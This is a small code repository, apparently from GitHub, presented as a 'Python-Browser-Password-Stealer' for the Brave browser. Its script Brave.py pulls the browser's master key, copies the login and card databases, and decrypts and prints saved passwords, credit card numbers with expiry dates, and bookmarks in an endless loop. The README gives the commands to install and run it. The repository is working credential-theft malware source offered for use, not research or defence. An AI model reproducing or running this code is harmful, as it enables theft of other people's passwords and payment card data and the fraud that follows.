├── requirements.txt ├── README.md ├── LICENSE └── Brave.py /requirements.txt: -------------------------------------------------------------------------------- 1 | pypiwin32 2 | sqlite3 3 | pycryptodome 4 | os 5 | json 6 | base64 7 | win32crypt 8 | Crypto 9 | shutil 10 | datetime 11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Python-Browser-Password-Stealer 2 | 3 | 4 | Python-Browser-Password-Stealer is a Python based Script that can fetch these informations 5 | 6 | - ✨ fetch Credit Cards Data ✨ 7 | - ✨ fetch Encrypted Passwords And Decrypt Them ✨ 8 | - ✨ fetch Bookmarks Data ✨ 9 | 10 | # Installation 11 | 12 | 13 | clone the repo and execute these command for installation 14 | 15 | ``` 16 | git clone https://github.com/abwahab5095/Python-Browser-Password-Stealer.git 17 | cd Python-Browser-Password-Stealer 18 | pip install -r requirements.txt 19 | 20 | python Brave.py 21 | 22 | ``` 23 | 24 | You can read my blog on this topic on Medium by using this link 25 | 26 | 27 | 28 | you can also support me by Buying me a Coffee 29 | 30 | 31 | Buy Me A Coffee 32 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Ab Wahab 5095 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Brave.py: -------------------------------------------------------------------------------- 1 | ''' 2 | This Python script is used to not only fetch browser saved passwords, but also Decrypt these Passwords. 3 | 4 | This Script can also fetch Stored Credit Card Data, Bookmarks 5 | You are free to modify this Script for your own use 6 | 7 | 8 | ''' 9 | 10 | import os 11 | import json 12 | import base64 13 | import sqlite3 14 | import win32crypt 15 | from Crypto.Cipher import AES 16 | import shutil 17 | from datetime import datetime 18 | 19 | 20 | 21 | FileName = 116444736000000000 22 | NanoSeconds = 10000000 23 | 24 | 25 | def ConvertDate(ft): 26 | utc = datetime.utcfromtimestamp(((10 * int(ft)) - FileName) / NanoSeconds) 27 | return utc.strftime('%Y-%m-%d %H:%M:%S') 28 | 29 | 30 | def get_master_key(): 31 | ''' 32 | This Function is used to get the Master Key, for Decrypting the Encrypted Passwords 33 | ''' 34 | try: 35 | with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State', 36 | "r", encoding='utf-8') as f: 37 | local_state = f.read() 38 | local_state = json.loads(local_state) 39 | except: 40 | exit() 41 | master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) 42 | master_key = master_key[5:] 43 | master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] 44 | return master_key 45 | 46 | 47 | def decrypt_payload(cipher, payload): 48 | return cipher.decrypt(payload) 49 | 50 | 51 | def generate_cipher(aes_key, iv): 52 | return AES.new(aes_key, AES.MODE_GCM, iv) 53 | 54 | 55 | def decrypt_password(buff, master_key): 56 | ''' 57 | Here we are passing the buffer and Master Key to Decrypt the Password 58 | 59 | 60 | ''' 61 | try: 62 | iv = buff[3:15] 63 | payload = buff[15:] 64 | cipher = generate_cipher(master_key, iv) 65 | decrypted_pass = decrypt_payload(cipher, payload) 66 | decrypted_pass = decrypted_pass[:-16].decode() 67 | return decrypted_pass 68 | except Exception as e: 69 | return "Chrome < 80" 70 | 71 | 72 | def get_password(): 73 | master_key = get_master_key() 74 | login_db = os.environ[ 75 | 'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Login Data' 76 | try: 77 | shutil.copy2(login_db, 78 | "Loginvault.db") 79 | except: 80 | print("[*] Brave Browser Not Installed !!") 81 | conn = sqlite3.connect("Loginvault.db") 82 | cursor = conn.cursor() 83 | 84 | try: 85 | cursor.execute("SELECT action_url, username_value, password_value FROM logins") 86 | for r in cursor.fetchall(): 87 | url = r[0] 88 | username = r[1] 89 | encrypted_password = r[2] 90 | decrypted_password = decrypt_password(encrypted_password, master_key) 91 | if username != "" or decrypted_password != "": 92 | print( 93 | "URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 10 + "\n") 94 | except Exception as e: 95 | pass 96 | 97 | cursor.close() 98 | conn.close() 99 | try: 100 | os.remove("Loginvault.db") 101 | except Exception as e: 102 | pass 103 | 104 | 105 | def get_credit_cards(): 106 | master_key = get_master_key() 107 | login_db = os.environ[ 108 | 'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Web Data' 109 | try: 110 | shutil.copy2(login_db, 111 | "CCvault.db") 112 | 113 | except: 114 | print("[*] Brave Browser Not Installed !!") 115 | conn = sqlite3.connect("CCvault.db") 116 | cursor = conn.cursor() 117 | 118 | try: 119 | cursor.execute("SELECT * FROM credit_cards") 120 | for r in cursor.fetchall(): 121 | username = r[1] 122 | encrypted_password = r[4] 123 | decrypted_password = decrypt_password(encrypted_password, master_key) 124 | expire_mon = r[2] 125 | expire_year = r[3] 126 | print( 127 | "Name in Card: " + username + "\nNumber: " + decrypted_password + "\nExpire Month: " + str( 128 | expire_mon) + "\nExpire Year: " + str(expire_year) + "\n" + "*" * 10 + "\n") 129 | 130 | except Exception as e: 131 | pass 132 | 133 | cursor.close() 134 | conn.close() 135 | try: 136 | os.remove("CCvault.db") 137 | except Exception as e: 138 | pass 139 | 140 | 141 | def get_bookmarks(): 142 | bookmarks_location = os.environ[ 143 | 'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Bookmarks' 144 | with open(bookmarks_location) as f: 145 | data = json.load(f) 146 | bookmarks_list = data["roots"]["bookmark_bar"]["children"] 147 | 148 | for i in range(len(bookmarks_list)): 149 | print(f"Name: {bookmarks_list[i]['name']}\n" 150 | f"Added on: {ConvertDate(bookmarks_list[i]['date_added'])}\n") 151 | 152 | 153 | while True: 154 | 155 | get_password() 156 | get_credit_cards() 157 | get_bookmarks() 158 | 159 | --------------------------------------------------------------------------------